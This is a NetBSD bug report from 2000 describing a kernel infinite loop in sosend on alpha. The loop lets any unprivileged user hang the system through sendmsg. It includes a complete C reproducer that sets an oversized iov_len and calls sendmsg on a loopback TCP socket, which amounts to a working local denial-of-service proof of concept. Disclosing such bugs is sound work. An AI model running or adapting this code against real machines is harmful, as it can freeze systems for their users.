>Number:         10070
>Category:       kern
>Synopsis:       sendmsg syscall may hang system on alpha
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    kern-bug-people
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Mon May 08 05:29:00 PDT 2000
>Closed-Date:
>Last-Modified:
>Originator:     Juergen Weiss
>Release:        1.4.2
>Organization:
Universitaet Mainz
>Environment:
NetBSD netadmin.zdv.Uni-Mainz.DE 1.4.1 NetBSD 1.4.1 (LOCAL) #0: Mon Aug 16 18:27:14 MEST 1999     root@netadmin.zdv.Uni-Mainz.DE:/usr/src/sys/arch/alpha/compile/LOCAL alpha


>Description:
Certain args to the sendmsg system call lead to an infinite
loop in the sosend kernel subroutine. Result is, that the system 
hangs - that is the process does not give up control, so no
process switching occurs. Any user can trigger this, no special
privs required.
>How-To-Repeat:
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/uio.h>
 


main()
{

     int sd;
     struct sockaddr_in addr;
     struct msghdr msg;
     struct iovec msg_iov;
     char buf[1000];

     bzero(&msg_iov, sizeof(msg_iov));
     msg_iov.iov_base = buf;
     msg_iov.iov_len = 4294967368;

     bzero(&msg, sizeof(msg));
     msg.msg_iov = &msg_iov;
     msg.msg_iovlen = 1;

     addr.sin_family = AF_INET;
     addr.sin_port = htons(21);
     addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
     sd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
     if (sd < 0)
         perror("socket err");
     if (connect(sd, &addr, sizeof(addr)) < 0)
         perror("connect");
     sendmsg(sd, &msg, 0);

}

>Fix:

>Release-Note:
>Audit-Trail:
>Unformatted: